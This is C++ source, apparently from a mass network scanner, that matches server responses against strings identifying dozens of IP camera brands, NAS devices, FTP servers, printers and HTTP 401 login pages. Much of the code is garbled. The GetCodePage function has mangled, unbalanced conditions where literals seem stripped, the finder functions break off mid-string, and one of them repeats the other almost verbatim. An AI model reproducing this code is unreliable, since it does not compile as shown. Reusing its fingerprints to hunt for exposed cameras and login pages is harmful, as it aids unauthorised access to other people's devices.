#pragma once #include "STh.h" #include "resource.h" char* __cdecl strstri(char *_Str, const char *_SubStr) { if(_Str != NULL) { string _lowStr = toLowerStr(_Str); string _lowSubStr = toLowerStr(_SubStr); const char *resChar = strstr(_lowStr.c_str(), _lowSubStr.c_str()); int offset = resChar - _lowStr.c_str(); if(offset < 0) return NULL; else return (char*)(_Str + offset); }; }; bool gGlobalTrackLocked = false; char *_findFirstOcc(char *str, char *delim) { int sz = strlen(str); int dsz = strlen(delim); for(int i = 0; i < sz; ++i) { for(int j = 0; j < dsz; ++j) { if(str[i] == delim[j]) return (char *)(str + i); }; }; //return str; return NULL; }; char *FindLastOcc(char *str, char *delim) { int sz = strlen(str); int dsz = strlen(delim); int savedPosition = 0; for(int i = 0; i < sz; ++i) { for(int j = 0; j < dsz; ++j) { if(str[i] == delim[j]) savedPosition = i; }; }; return (char *)(str + savedPosition); }; char *GetCodePage(char *str) { char cdpg[32] = {0}; if(strstri(str, "\n\r"); if(temp4 != NULL) { int ln = (int)(temp4 - temp3 - strlen("charset=")); if(ln > 16) { return "WTF?"; }; strncpy(cdpg, (char *)(temp3 + strlen("charset=")), (ln > 32) ? 32 : ln ); if(strstri(cdpg, "%s") != NULL) return "UTF-8"; return cdpg; } else { stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); }; } else if(strstri((char *)(temp2 + strlen("\n\r"); if(temp4 != NULL) { int ln = (int)(temp4 - temp3 - strlen("charset = ")); if(ln > 16) { return "WTF?"; }; strncpy(cdpg, (char *)(temp3 + strlen("charset = ")), (ln > 32) ? 32 : ln ); if(strstri(cdpg, "%s") != NULL) return "UTF-8"; return cdpg; } else { stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); }; } else if(strstri((char *)(temp2 + strlen("\n\r"); if(temp4 != NULL) { int ln = (int)(temp4 - temp3 - strlen("charset =")); if(ln > 16) { return "WTF?"; }; strncpy(cdpg, (char *)(temp3 + strlen("charset =")), (ln > 32) ? 32 : ln ); if(strstri(cdpg, "%s") != NULL) return "UTF-8"; return cdpg; } else { stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); }; } else { if(strstri(str, "charset=") != NULL) { char *temp2 = strstri(str, "charset="); char *temp3 = _findFirstOcc((char *)(temp2 + strlen("charset=")), " \"'>\n\r"); if(temp3 != NULL) { int ln = (int)(temp3 - temp2 - strlen("charset=")); if(ln > 16) { return "WTF?"; }; strncpy(cdpg, (char *)(temp2 + strlen("charset=")), (ln > 32) ? 32 : ln ); if(strstri(cdpg, "%s") != NULL) return "UTF-8"; return cdpg; } else { stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); } } else { return "NULL"; }; }; } else if(strstri(str, "charset=") != NULL) { char *temp2 = strstri(str, "charset="); char *temp3 = _findFirstOcc((char *)(temp2 + strlen("charset=")), " \"'\n\r"); if(temp3 != NULL) { int ln = (int)(temp3 - temp2 - strlen("charset=")); if(ln > 16) { return "WTF?"; }; strncpy(cdpg, (char *)(temp2 + strlen("charset=")), (ln > 32) ? 32 : ln ); if(strstri(cdpg, "%s") != NULL) return "UTF-8"; return cdpg; } else { stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); }; } else { return "NULL"; }; }; int Lexems::globalSearchNeg(const char *buffcpy, char *ip, int port) { if(strlen(buffcpy) == 0) return -1; // char buffcpy[RECV_MAX_LENGTH] = {0}; //std::string rr = toLowerStr(xcode(buffcp, CP_UTF8, CP_ACP).c_str()); //memcpy((void*)buffcpy, rr.c_str(), rr.size()); char negWord[256] = {0}; for(int i = 0; i < GlobalNegativeSize; i++) { if(globalScanFlag) { strcpy(negWord, GlobalNegatives[i]); if(strstr(buffcpy, negWord) != NULL && (strcmp(negWord, "") != 0 || strlen(negWord) >= 2)) { if(gNegDebugMode) { stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\""); if(strlen(negWord) < 2) { stt->doEmitionDebugFoundData(" Len:" + QString::number(strlen(negWord))); }; if(strcmp(negWord, "") == 0) { stt->doEmitionDebugFoundData("Empty hit!"); }; if(strcmp(negWord, " ") == 0) { stt->doEmitionDebugFoundData("Space hit!"); }; }; ++Filt; return -1; }; }; ZeroMemory(negWord, 256); }; return 0; }; int globalSearchPrnt(char *buffcpy) { if(strstr(buffcpy, "en/_top.htm") != NULL || strstr(buffcpy, "cannon http server") != NULL || strstr(buffcpy, "konica minolta") != NULL || strstr(buffcpy, "/eng/home_frm.htm") != NULL || strstr(buffcpy, "networkScanner webserver") != NULL || strstr(buffcpy, "/eng/htm/top.htm") != NULL || strstr(buffcpy, "pages/t_ixdmy.htm") != NULL || strstr(buffcpy, "/web/guest/") != NULL || strstr(buffcpy, "printerInfo") != NULL || strstr(buffcpy, "hp photosmart") != NULL || strstr(buffcpy, "menu and") != NULL || strstr(buffcpy, "hewlett packard") != NULL || strstr(buffcpy, "laserjet") != NULL || strstr(buffcpy, "supplies summary") != NULL || strstr(buffcpy, "seiko epson") != NULL || strstr(buffcpy, "ink_y.png") != NULL || strstr(buffcpy, "epsonnet") != NULL || strstr(buffcpy, "printer name") != NULL ) { if(gNegDebugMode) { stt->doEmitionDebugFoundData("Printer detected."); }; return -1; }; }; // 500 < 1600 Lexems lxf; int _mainFinderFirst(char *buffcpy, int f, int port, char *ip) { if((strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL ) || strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL) ) && strstr(buffcpy, "digest realm") != NULL) return 101; if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL ) || strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL) ) return 1; if(strstr(buffcpy, "netwave ip camera")) return 11; if(strstr(buffcpy, "live view / - axis")) return 12; if(strstr(buffcpy, "vilar ipcamera")) return 13; if(strstr(buffcpy, "window.location = \"rdr.cgi\"")) return 14; if(strstr(buffcpy, "httpfileserver")) return 15; if(strstr(buffcpy, "real-time ip camera monitoring system") != NULL || strstr(buffcpy, "server push mode") != NULL ) return 17; //Real-time IP Camera Monitoring System if(strstr(buffcpy, "linksys.com") != NULL && strstr(buffcpy, "tm05") != NULL) return 18; //linksys.com cameras if(strstr(buffcpy, "reecam ip camera") != NULL) return 19; //reecam cameras if(strstr(buffcpy, "bridge eyeon") != NULL) return 21; //Bridge Eyeon if(strstr(buffcpy, "ip camera control webpage") != NULL && strstr(buffcpy, "/main/cs_motion.asp") != NULL) return 22; //ip camera control if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/live/index2.html") != NULL) return 23; //network camera BB-SC384 if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/en/live.html") != NULL) return 24; //Network Camera VB-M40 if(strstr(buffcpy, "panasonic ") != NULL && strstr(buffcpy, ":60002/snapshotjpeg") != NULL) return 25; //Panasonic wtfidonteven-camera if(strstr(buffcpy, "sony network camera") != NULL && strstr(buffcpy, "/command/inquiry.cgi?") != NULL) return 26; //Sony Network Camera if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "src=\"webs.cgi?") != NULL) return 27; //UA Network Camera if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/index.html") != NULL) return 28; //Network Camera VB-M40 if(strstr(buffcpy, "lg smart ip device") != NULL) return 29; //LG Smart IP Device Camera if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras if(strstr(buffcpy, "nas") != NULL && strstr(buffcpy, "/cgi-bin/data/viostor-220/viostor/viostor.cgi") != NULL) return 30; //NAX if(strstr(buffcpy, "ip camera") != NULL && strstr(buffcpy, "check_user.cgi") != NULL) return 31; //ip cams if(strstr(buffcpy, "ws(\"user\");") != NULL && strstr(buffcpy, "src=\"/tool.js") != NULL && strstr(buffcpy, "") != NULL) return 32; //IPC web ip cam if(strstr(buffcpy, "geovision") != NULL && (strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ssi.cgi/login.htm") != NULL)) return 33; //GEO web ip cam if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL) || (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam if(strstr(buffcpy, "easy cam") != NULL && strstr(buffcpy, "easy life") != NULL) return 35; //EasyCam if(strstr(buffcpy, "/config/cam_portal.cgi") != NULL || strstr(buffcpy, "/config/easy_index.cgi") != NULL) return 36; //Panasonic Cam if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/view/getuid.cgi") != NULL) return 37; //Panasonic Cam WJ-HD180 if(strstr(buffcpy, "ipcam client") != NULL && strstr(buffcpy, "plugins.xpi") != NULL && strstr(buffcpy, "js/upfile.js") != NULL) return 38; //Foscam if(strstr(buffcpy, "ip surveillance") != NULL && strstr(buffcpy, "customer login") != NULL) return 39; //EagleEye if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/admin/index.shtml?") != NULL) return 40; //Network Camera VB-C300 if(strstr(buffcpy, "sq-webcam") != NULL && strstr(buffcpy, "liveview.html") != NULL) return 41; //AVIOSYS-camera if(((strstr(buffcpy, "220") != NULL) && (port == 21)) || (strstri(buffcpy, "220 diskStation ftp server ready") != NULL) || (strstri(buffcpy, "220 ftp server ready") != NULL) || strstr(buffcpy, "500 'get': command not understood") != NULL ) return 16; // 16 - FTP if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL || strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL || strstr(buffcpy, "hfs /") != NULL || strstr(buffcpy, "httpfileserver") != NULL || strstr(buffcpy, "network camera server") != NULL || strstr(buffcpy, "ipcamera") != NULL || strstr(buffcpy, "$lock extended") != NULL || strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ipcam_language") != NULL || strstr(buffcpy, "/viewer/video.jpg") != NULL || strstr(buffcpy, "smart ip device") != NULL || strstr(buffcpy, "sanpshot_icon") != NULL || strstr(buffcpy, "snapshot_icon") != NULL || strstr(buffcpy, "ipcam") != NULL ) return 0; if(lxf.globalSearchNeg(buffcpy, ip, port) == -1) return -1; if(globalSearchPrnt(buffcpy) == -1) return -1; if(strstr(buffcpy, "
1600 int _mainFinderSecond(char *buffcpy, int port, char *ip) { if((strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL ) || strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL) ) && strstr(buffcpy, "digest realm") != NULL) return 101; if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL ) || strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL) ) return 1; if(strstr(buffcpy, "netwave ip camera")) return 11; if(strstr(buffcpy, "live view / - axis")) return 12; if(strstr(buffcpy, "vilar ipcamera")) return 13; if(strstr(buffcpy, "window.location = \"rdr.cgi\"")) return 14; if(strstr(buffcpy, "httpfileserver")) return 15; if(strstr(buffcpy, "real-time ip camera monitoring system") != NULL || strstr(buffcpy, "server push mode") != NULL ) return 17; //Real-time IP Camera Monitoring System if(strstr(buffcpy, "linksys.com") != NULL && strstr(buffcpy, "tm05") != NULL) return 18; //linksys.com cameras if(strstr(buffcpy, "reecam ip camera") != NULL) return 19; //reecam cameras if(strstr(buffcpy, "bridge eyeon") != NULL) return 21; //Bridge Eyeon if(strstr(buffcpy, "ip camera control webpage") != NULL && strstr(buffcpy, "/main/cs_motion.asp") != NULL) return 22; //ip camera control if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/live/index2.html") != NULL) return 23; //network camera BB-SC384 if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/en/live.html") != NULL) return 24; //Network Camera VB-M40 if(strstr(buffcpy, "panasonic ") != NULL && strstr(buffcpy, ":60002/snapshotjpeg") != NULL) return 25; //Panasonic wtfidonteven-camera if(strstr(buffcpy, "sony network camera") != NULL && strstr(buffcpy, "/command/inquiry.cgi?") != NULL) return 26; //Sony Network Camera if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "src=\"webs.cgi?") != NULL) return 27; //UA Network Camera if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/index.html") != NULL) return 28; //Network Camera VB-M40 if(strstr(buffcpy, "lg smart ip device") != NULL) return 29; //LG Smart IP Device Camera if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras if(strstr(buffcpy, "nas") != NULL && strstr(buffcpy, "/cgi-bin/data/viostor-220/viostor/viostor.cgi") != NULL) return 30; //NAX if(strstr(buffcpy, "ip camera") != NULL && strstr(buffcpy, "check_user.cgi") != NULL) return 31; //axis cameras if(strstr(buffcpy, "ws(\"user\");") != NULL && strstr(buffcpy, "src=\"/tool.js") != NULL && strstr(buffcpy, "") != NULL) return 32; //web ip cam if(strstr(buffcpy, "geovision") != NULL && (strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ssi.cgi/login.htm") != NULL)) return 33; //GEO web ip cam if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL) || (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam if(strstr(buffcpy, "easy cam") != NULL && strstr(buffcpy, "easy life") != NULL) return 35; //EasyCam if(strstr(buffcpy, "/config/cam_portal.cgi") != NULL || strstr(buffcpy, "/config/easy_index.cgi") != NULL) return 36; //Panasonic Cam if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/view/getuid.cgi") != NULL) return 37; //Panasonic Cam WJ-HD180 if(strstr(buffcpy, "ipcam client") != NULL && strstr(buffcpy, "plugins.xpi") != NULL && strstr(buffcpy, "js/upfile.js") != NULL) return 38; //Foscam if(strstr(buffcpy, "ip surveillance") != NULL && strstr(buffcpy, "customer login") != NULL) return 39; //EagleEye if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/admin/index.shtml?") != NULL) return 40; //Network Camera VB-C300 if(strstr(buffcpy, "sq-webcam") != NULL && strstr(buffcpy, "liveview.html") != NULL) return 41; //AVIOSYS-camera if(((strstr(buffcpy, "220") != NULL) && (port == 21)) || (strstr(buffcpy, "220 diskStation ftp server ready") != NULL) || (strstr(buffcpy, "220 ftp server ready") != NULL) || strstr(buffcpy, "500 'get': command not understood") != NULL ) return 16; // 16 - FTP if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL || strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL || strstr(buffcpy, "hfs /") != NULL || strstr(buffcpy, "httpfileserver") != NULL || strstr(buffcpy, "network camera server") != NULL || strstr(buffcpy, "ipcamera") != NULL || strstr(buffcpy, "$lock extended") != NULL || strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ipcam_language") != NULL || strstr(buffcpy, "/viewer/video.jpg") != NULL || strstr(buffcpy, "smart ip device") != NULL || strstr(buffcpy, "sanpshot_icon") != NULL || strstr(buffcpy, "snapshot_icon") != NULL || strstr(buffcpy, "ipcam") != NULL ) return 0; if(lxf.globalSearchNeg(buffcpy, ip, port) == -1) return -1; if(globalSearchPrnt(buffcpy) == -1) return -1; if(strstr(buffcpy, "